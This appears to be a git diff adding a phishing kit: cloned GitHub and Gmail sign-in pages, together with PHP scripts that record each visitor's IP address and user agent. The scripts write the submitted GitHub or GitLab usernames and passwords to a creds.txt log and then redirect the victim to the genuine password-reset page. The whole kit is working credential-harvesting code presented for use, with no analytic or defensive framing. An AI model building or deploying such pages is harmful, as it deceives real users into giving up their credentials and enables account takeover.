background: #FFEBE8;
border: 1.5px solid red;
}
.red-box p {
font-size: 10.5px;
font-family: tahoma;
padding: 14px 0 0 20px;
}
.red-box a {
text-decoration: none;
color: #3B5998;
}
.red-box a:hover {
text-decoration: underline;
}
.login-form {
width:75%;
margin: 0 auto;
padding: 23px 0 0 0;
}
.login-form label {
font-family: tahoma;
font-size: 13px;
padding: 2px 10px 3px 5px;
}
.login-form input {
padding: 2px 10px 3px 5px;
}
footer {
width: 984px;
margin:0 auto;
border-top: 1.5px solid #cccccc;
}
ul li {
display: inline;
margin: 0 0 0 28px;
}
ul li a {
text-decoration: none;
font-family: tahoma;
font-size: 10.5px;
color: #3B5998;
}
ul li a:hover {
text-decoration: underline;
}

View File

@ -0,0 +1,327 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<link rel="dns-prefetch" href="https://github.githubassets.com">
<link rel="dns-prefetch" href="https://avatars.githubusercontent.com">
<link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">
<link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">
<link crossorigin="anonymous" media="all" integrity="sha512-k9NM/a2xYY6wCRcWG7f3ROm4X5CJNikViGX0N8YIxs6sUYAe/j08/RSHXr3fA9wLIy87AMFCgXm6jbvhZhIXWw==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-93d34cfdadb1618eb00917161bb7f744.css" />
<link crossorigin="anonymous" media="all" integrity="sha512-ZUf6K+vQqMY+RhVzaRmCy2ePbSZad4TkaGRbd6v5gFt6f9Q/nqjDkBDjQgXNmZw7J9mcYxlsE4fhRw7CTluRow==" rel="stylesheet" href="https://github.githubassets.com/assets/site-6547fa2bebd0a8c63e461573691982cb.css" />
<link crossorigin="anonymous" media="all" integrity="sha512-mm2SigzEudA9xS8nyiKvpPVLuATFJopEhsZReSWJTnUk/C6N2PmCkm3AltG5pf405Lxuqwah2aQ7rCEf+Rjbiw==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-9a6d928a0cc4b9d03dc52f27ca22afa4.css" />
<link crossorigin="anonymous" media="all" integrity="sha512-ADxBGP+/Ejuf3hdfXt1DPBnGrlQ47QqWJG2/uzyeofvKQGbkHG8l5dAmbOThfWzViBmMF+vy43i5TLs2M+J+4g==" rel="stylesheet" href="https://github.githubassets.com/assets/github-003c4118ffbf123b9fde175f5edd433c.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-8K2vvwbW+6H27Nad5ydg8PA2/aMD/LKq+EiK9s0U0hhVZxCI2tWBsYk9beAtisRw2j+Or5k2/F+6dk02nmj/PA==" type="application/javascript" src="https://github.githubassets.com/assets/environment-f0adafbf.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-Of+WG2CISim899I88sYG7d/75B6gHRWbUDvUOJDh52ZKHoHClE8JQ4nZbvOrvIVTGKCUe68JogcDBUMVtQ7F8w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-39ff961b.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-7GvK4gfpB9Ztz8H6JMSvF2zkjlAfbaRjfl7n1VtRpOc7huXjL3iGa8FuQiFTvdPX1fd8IYbNtXZoEDZa3RVOrQ==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-ec6bcae2.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-LrlbFtVuiWoRKQh9cFzkYpcKwheTNTA3TrW7JLVCmEXKXR12EaKZsxRyACxZoBxeHvaak562K8ShalgfBhmhZw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-2eb95b16.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-xDmMfbDOi7C1qDeTcUUIjKfOAG5qhfSNSHRf7wT0crqnTCqtHlO1jBZmRSpjbpn4RyitzX75K0wQ/dpHqO/gAg==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-c4398c7d.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-obMR8mPKx8OvqRe34LgnUcxeJ1qujiA4ND3H6UX13ExMlA/WfHLjEzXRmgGRcRvN/8J1nzc+Z+jgz/PLTFy6zg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-a1b311f2.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-TGnbT/6B5dxVwEk7iOlwSY9mfqhfq8m05ec+KjdlfEwoieq73iBeyidClQUSmFa2snukwzF9peY8c7FJf9FARA==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-4c69db4f.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-NwYkwzxETzKUYRXumHDsBIuggkh86KmJ1WrwWZW5wTvVPf047+wOmOHI5b4D65bfdtd3WbXJ7k+3ZWoxpIaqcA==" type="application/javascript" data-module-id="./chunk-insights-graph.js" data-src="https://github.githubassets.com/assets/chunk-insights-graph-370624c3.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-o7Wgi+lb9ce+9dvjWvB30ar51Bw0wcGhFZfQIzNGZfJ/7GZwYxVCsqgA4Q2o8yRq1QDUL1G1NxR0/3o9FoQ9JQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-a3b5a08b.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-tcH4xCRuMBAh1PruDaiwGnRIbHlF6bGLhxyCQ16uqok1cV5QFMguVPWJtN9KI0jGQOgN+Pha3+uOUXhXdfK/qw==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-b5c1f8c4.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-E+H+wAtjiqutBvn2cnXzDIvmasIhYiS7i7JzOfFUwo+Ej8zT54OrJtP//RhwixnypgOpCF4JvqzYy6zOtORDmg==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-13e1fec0.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-U+Pp1bYuA3fRqhike5Go//O/vsExaZLz00lrIby+rZ88yf03nQHz3wLZR9paWkakpD7TH5nS6AUpabCc7OFWpg==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-53e3e9d5.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-QBwrFY4kzAVN0nZmTYJLeEhi5bQ+42rE8h1g384XeZb7n62BykcUICACtaDQ473aIrRf38RSR7WDfNEIVuSlTA==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-401c2b15.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-su8FOuJFv0H16y8vmT+N3HiFpDQnHKiLz/UEdGxlCfgwnKBy202gaBmkcBpqXigRg+A8pMDXcSPIWSEW+IIKvQ==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-b2ef053a.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-qFsShJX3EkHdcQq11CLfRk444sM6/0OBXB8eTN3FZl70HSy6jUPI2M9H6/wNWDwOR+LLU/JE55Y2kl1CK1QioQ==" type="application/javascript" src="https://github.githubassets.com/assets/unsupported-a85b1284.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-rvJsuqEABlg0AZgt+K7Uvy9sM1ufX1eaMJ++LgsHFD9YtbTd3Xk9zS4phxmjuxNhyDg4NEtWsdExEwPbehgn9A==" type="application/javascript" src="https://github.githubassets.com/assets/settings-aef26cba.js"></script>
<script crossorigin="anonymous" defer="defer" integrity="sha512-RQhP6glI7eiTPchtQPPLQoeoFe3ehP5TvUen/f0960jJHf6hYRef+W0G5jNmdrLmSZ5YKkvo1yFmI2wKjnWWJQ==" type="application/javascript" src="https://github.githubassets.com/assets/sessions-45084fea.js"></script>
<meta name="viewport" content="width=device-width">
<title>Sign in to GitHub · GitHub</title>
<meta name="description" content="GitHub is where people build software. More than 56 million people use GitHub to discover, fork, and contribute to over 100 million projects.">
<link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub">
<link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub">
<meta property="fb:app_id" content="1401488693436528">
<meta property="og:url" content="https://github.com">
<meta property="og:site_name" content="GitHub">
<meta property="og:title" content="Build software better, together">
<meta property="og:description" content="GitHub is where people build software. More than 56 million people use GitHub to discover, fork, and contribute to over 100 million projects.">
<meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-logo.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="1200">
<meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-mark.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="620">
<meta property="og:image" content="https://github.githubassets.com/images/modules/open_graph/github-octocat.png">
<meta property="og:image:type" content="image/png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="620">
<meta property="twitter:site" content="github">
<meta property="twitter:site:id" content="13334762">
<meta property="twitter:creator" content="github">
<meta property="twitter:creator:id" content="13334762">
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:title" content="GitHub">
<meta property="twitter:description" content="GitHub is where people build software. More than 56 million people use GitHub to discover, fork, and contribute to over 100 million projects.">
<meta property="twitter:image:src" content="https://github.githubassets.com/images/modules/open_graph/github-logo.png">
<meta property="twitter:image:width" content="1200">
<meta property="twitter:image:height" content="1200">
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="1246:3087:6BE375:79E87D:601285A5" data-pjax-transient="true" /><meta name="html-safe-nonce" content="91e589bc1c81fb071eb9659d65ff172d40a3beab2b323ea68c49d35e0d8f622a" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjEyNDY6MzA4Nzo2QkUzNzU6NzlFODdEOjYwMTI4NUE1IiwidmlzaXRvcl9pZCI6IjczNDgzNTQ4NjgxNjg5NjM5MSIsInJlZ2lvbl9lZGdlIjoiYXAtc291dGhlYXN0LTEiLCJyZWdpb25fcmVuZGVyIjoiaWFkIn0=" data-pjax-transient="true" /><meta name="visitor-hmac" content="ec347cae631653de2523b1718e8fc866f693b32169483d04d3150b59c990215f" data-pjax-transient="true" />
<meta name="github-keyboard-shortcuts" content="" data-pjax-transient="true" />
<meta name="selected-link" value="/login" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY">
<meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU">
<meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA">
<meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-host" content="collector.githubapp.com" /><meta name="octolytics-app-id" content="github" /><meta name="octolytics-event-url" content="https://collector.githubapp.com/github-external/browser_event" />
<meta name="analytics-location-query-strip" content="true" data-pjax-transient="true" />
<meta name="hostname" content="github.com">
<meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,ACTIONS_SHORT_SHA_WARNING">
<meta http-equiv="x-pjax-version" content="845125e2c5df586fb6fd0d3838d81eef781b2a02154b03084b19413818eeb44e">
<link rel="canonical" href="https://github.com/login" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000">
<link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png">
<link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327">
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive session-authentication">
<div class="position-relative js-header-wrapper ">
<a href="#start-of-content" class="px-2 py-4 bg-blue text-white show-on-focus js-skip-to-content">Skip to content</a>
<span class="progress-pjax-loader width-full js-pjax-loader-bar Progress position-fixed">
<span style="background-color: #79b8ff;width: 0%;" class="Progress-item progress-pjax-loader-bar "></span>
</span>
<div id="unsupported-browser" class="unsupported-browser" hidden>
<div class="container-lg p-responsive clearfix d-flex flex-items-center py-2">
<svg height="16" class="octicon octicon-alert mr-2 color-gray-7 hide-sm" viewBox="0 0 16 16" version="1.1" width="16" aria-hidden="true"><path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg>
<div class="d-flex flex-auto flex-column flex-md-row">
<div class="flex-auto min-width-0 mr-2" style="padding-top:1px">
<span>GitHub no longer supports this web browser.</span>
<a href="https://docs.github.com/articles/supported-browsers">
Learn more about the browsers we support.
</a>
</div>
</div>
</div>
</div>
<div class="header header-logged-out width-full pt-5 pb-4" role="banner">
<div class="container clearfix width-full text-center">
<a class="header-logo" href="https://github.com/" aria-label="Homepage" data-ga-click="(Logged out) Header, go to homepage, icon:logo-wordmark">
<svg height="48" class="octicon octicon-mark-github" viewBox="0 0 16 16" version="1.1" width="48" aria-hidden="true"><path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
</a>
</div>
</div>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div
class="application-main "
data-commit-hovercards-enabled
data-discussion-hovercards-enabled
data-issue-and-pr-hovercards-enabled
>
<main id="js-pjax-container" data-pjax-container>
<div class="auth-form px-3" id="login" >
<input type="hidden" name="ga_id" class="js-octo-ga-id-input">
<div class="auth-form-header p-0">
<h1>Sign in to GitHub</h1>
</div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template">
<div class="flash flash-full {{ className }}">
<div class="container-lg px-2" >
<button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message">
<svg class="octicon octicon-x" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg>
</button>
<div>{{ message }}</div>
</div>
</div>
</template>
</div>
<div class="flash js-transform-notice" hidden>
<button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message">
<svg aria-label="Dismiss" class="octicon octicon-x" height="16" viewBox="0 0 16 16" version="1.1" width="16" aria-hidden="true"><path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg>
</button>
</div>
<div class="auth-form-body mt-3">
<!-- '"` --><!-- </textarea></xmp> --></option></form><form action="login.php" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="wpHaz3YYZFZ0jU4ovlnnZhcGa/BwyYoQKKxP5uEajYzZst9KtoAI/hFcoSQMU7ddOlrfEVltWBM8fDpobkHUUA==" /> <label for="login_field">
Username or email address
</label>
<input type="text" name="login" id="login_field" class="form-control input-block" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="autofocus" />
<label for="password">
Password <a class="label-link" href="#">Forgot password?</a>
</label>
<input type="password" name="password" id="password" class="form-control form-control input-block" autocomplete="current-password" />
<input type="hidden" name="trusted_device" id="trusted_device" class="form-control" />
<input type="hidden" class="js-webauthn-support" name="webauthn-support" value="unknown">
<input type="hidden" class="js-webauthn-iuvpaa-support" name="webauthn-iuvpaa-support" value="unknown">
<input type="hidden" name="return_to" id="return_to" class="form-control" />
<input type="hidden" name="allow_signup" id="allow_signup" class="form-control" />
<input type="hidden" name="client_id" id="client_id" class="form-control" />
<input type="hidden" name="integration" id="integration" class="form-control" />
<input type="text" name="required_field_85d6" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1611826598095" class="form-control" /><input type="hidden" name="timestamp_secret" value="475be815fb512b20cb28fae2003e6ed5b71d828892f13baaf2168f9e2134ad75" class="form-control" />
<input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block" data-disable-with="Signing in…" />
</form>
</div>
<p class="login-callout mt-3">
New to GitHub?
<a data-ga-click="Sign in, switch to sign up" data-hydro-click="{&quot;event_type&quot;:&quot;authentication.click&quot;,&quot;payload&quot;:{&quot;location_in_page&quot;:&quot;sign in switch to sign up&quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/login&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="72d062e79bb6ab076a3b88b32943286ea51894183bd812a5038d00013946f239" href="/join?source=login">Create an account</a>.
</p>
</div>
</main>
</div>
<div class="footer container-lg p-responsive py-6 mt-6 f6" role="contentinfo">
<ul class="list-style-none d-flex flex-justify-center">
<li class="mr-3"><a href="/site/terms" data-ga-click="Footer, go to terms, text:terms">Terms</a></li>
<li class="mr-3"><a href="/site/privacy" data-ga-click="Footer, go to privacy, text:privacy">Privacy</a></li>
<li class="mr-3"><a href="https://docs.github.com/articles/github-security/" data-ga-click="Footer, go to security, text:security">Security</a></li>
<li><a class="link-gray" data-ga-click="Footer, go to contact, text:contact" href="https://github.com/contact">Contact GitHub</a></li>
</ul>
</div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden>
<svg class="octicon octicon-alert" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg>
<button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error">
<svg class="octicon octicon-x" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg>
</button>
You cant perform that action at this time.
</div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden
>
<svg class="octicon octicon-alert" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg>
<span class="js-stale-session-flash-signed-in" hidden>You signed in with another tab or window. <a href="">Reload</a> to refresh your session.</span>
<span class="js-stale-session-flash-signed-out" hidden>You signed out in another tab or window. <a href="">Reload</a> to refresh your session.</span>
</div>
<template id="site-details-dialog">
<details class="details-reset details-overlay details-overlay-dark lh-default text-gray-dark hx_rsm" open>
<summary role="button" aria-label="Close dialog"></summary>
<details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal">
<button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog>
<svg class="octicon octicon-x" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg>
</button>
<div class="octocat-spinner my-6 js-details-dialog-spinner"></div>
</details-dialog>
</details>
</template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0">
<div class="Popover-message Popover-message--bottom-left Popover-message--large Box box-shadow-large" style="width:360px;">
</div>
</div>
</body>
</html>

View File

@ -0,0 +1,28 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Github Username: " . $_POST['login'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://github.com/password_reset');
exit();
?>

View File

@ -0,0 +1,5 @@
<?php
include 'ip.php';
header('Location: login.html');
exit
?>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,28 @@
<?php
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ipaddr = $_SERVER['HTTP_CLIENT_IP'];
}
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ipaddr = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
$ipaddr = $_SERVER['REMOTE_ADDR'];
}
if(strpos($ipaddr,',') !== false)
{
$ipaddr = preg_split("/\,/", $ipaddr)[0];
}
$fp = fopen("../logs/creds.txt", 'a');
fwrite($fp, "\n\nTimestamp: " . date('Y-m-d H:i:s') . "\nIP: " . $ipaddr . "\r\n" . "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\n");
fclose($fp);
file_put_contents("../logs/creds.txt", "Gitlab Username: " . $_POST['login'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://gitlab.com/users/password/new');
exit();
?>

Binary file not shown.

After

Width:  |  Height:  |  Size: 6.5 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 14 KiB

View File

@ -0,0 +1,925 @@
<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta content="width=300, initial-scale=1" name="viewport">
<meta name="jingle" value="notranslate">
<meta name="description" content=".">
<title>Gmail</title>
<style>
html, body {
font-family: Arial, sans-serif;
background: #fff;
margin: 0;
padding: 0;
border: 0;
position: absolute;
height: 100%;
min-width: 100%;
font-size: 13px;
color: #404040;
direction: ltr;
-webkit-text-size-adjust: none;
}
button,
input[type=button],
input[type=submit] {
font-family: Arial, sans-serif;
}
a,
a:hover,
a:visited {
color: #427fed;
cursor: pointer;
text-decoration: none;
}
a:hover {
text-decoration: underline;
}
h1 {
font-size: 20px;
color: #262626;
margin: 0 0 15px;
font-weight: normal;
}
h2 {
font-size: 14px;
color: #262626;
margin: 0 0 15px;
font-weight: bold;
}
input[type=email],
input[type=number],
input[type=password],
input[type=tel],
input[type=text],
input[type=url] {
-moz-appearance: none;
-webkit-appearance: none;
appearance: none;
display: inline-block;
height: 36px;
padding: 0 8px;
margin: 0;
background: #fff;
border: 1px solid #d9d9d9;
border-top: 1px solid #c0c0c0;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
font-size: 15px;
color: #404040;
}
input[type=email]:focus,
input[type=number]:focus,
input[type=password]:focus,
input[type=tel]:focus,
input[type=text]:focus,
input[type=url]:focus {
outline: none;
border: 1px solid #4d90fe;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
}
input[type=checkbox],
input[type=radio] {
-webkit-appearance: none;
display: inline-block;
width: 13px;
height: 13px;
margin: 0;
cursor: pointer;
vertical-align: bottom;
background: #fff;
border: 1px solid #c6c6c6;
-moz-border-radius: 1px;
-webkit-border-radius: 1px;
border-radius: 1px;
-moz-box-sizing: border-box;
-webkit-box-sizing: border-box;
box-sizing: border-box;
position: relative;
}
input[type=checkbox]:active,
input[type=radio]:active {
background: #ebebeb;
}
input[type=checkbox]:hover {
border-color: #c6c6c6;
-moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
-webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
}
input[type=radio] {
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
width: 15px;
height: 15px;
}
input[type=checkbox]:checked,
input[type=radio]:checked {
background: #fff;
}
input[type=radio]:checked::after {
content: '';
display: block;
position: relative;
top: 3px;
left: 3px;
width: 7px;
height: 7px;
background: #666;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
}
input[type=checkbox]:checked::after {
content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
display: block;
position: absolute;
top: -6px;
left: -5px;
}
input[type=checkbox]:focus {
outline: none;
border-color: #4d90fe;
}
.stacked-label {
display: block;
font-weight: bold;
margin: .5em 0;
}
.hidden-label {
position: absolute !important;
clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
clip: rect(1px, 1px, 1px, 1px);
height: 0px;
width: 0px;
overflow: hidden;
visibility: hidden;
}
input[type=checkbox].form-error,
input[type=email].form-error,
input[type=number].form-error,
input[type=password].form-error,
input[type=text].form-error,
input[type=tel].form-error,
input[type=url].form-error {
border: 1px solid #dd4b39;
}
.error-msg {
margin: .5em 0;
display: block;
color: #dd4b39;
line-height: 17px;
}
.help-link {
background: #dd4b39;
padding: 0 5px;
color: #fff;
font-weight: bold;
display: inline-block;
-moz-border-radius: 1em;
-webkit-border-radius: 1em;
border-radius: 1em;
text-decoration: none;
position: relative;
top: 0px;
}
.help-link:visited {
color: #fff;
}
.help-link:hover {
color: #fff;
background: #c03523;
text-decoration: none;
}
.help-link:active {
opacity: 1;
background: #ae2817;
}
.wrapper {
position: relative;
min-height: 100%;
}
.content {
padding: 0 44px;
}
.main {
padding-bottom: 100px;
}
/* For modern browsers */
.clearfix:before,
.clearfix:after {
content: "";
display: table;
}
.clearfix:after {
clear: both;
}
/* For IE 6/7 (trigger hasLayout) */
.clearfix {
zoom:1;
}
.google-header-bar {
height: 71px;
border-bottom: 1px solid #e5e5e5;
overflow: hidden;
}
.header .logo {
margin: 17px 0 0;
float: left;
height: 45px;
width: 116px;
}
.header .secondary-link {
margin: 28px 0 0;
float: right;
}
.header .secondary-link a {
font-weight: normal;
}
.google-header-bar.centered {
border: 0;
height: 108px;
}
.google-header-bar.centered .header .logo {
float: none;
margin: 40px auto 30px;
display: block;
}
.google-header-bar.centered .header .secondary-link {
display: none
}
.google-footer-bar {
position: absolute;
bottom: 0;
height: 35px;
width: 100%;
border-top: 1px solid #e5e5e5;
overflow: hidden;
}
.footer {
padding-top: 7px;
font-size: .85em;
white-space: nowrap;
line-height: 0;
}
.footer ul {
float: left;
max-width: 80%;
padding: 0;
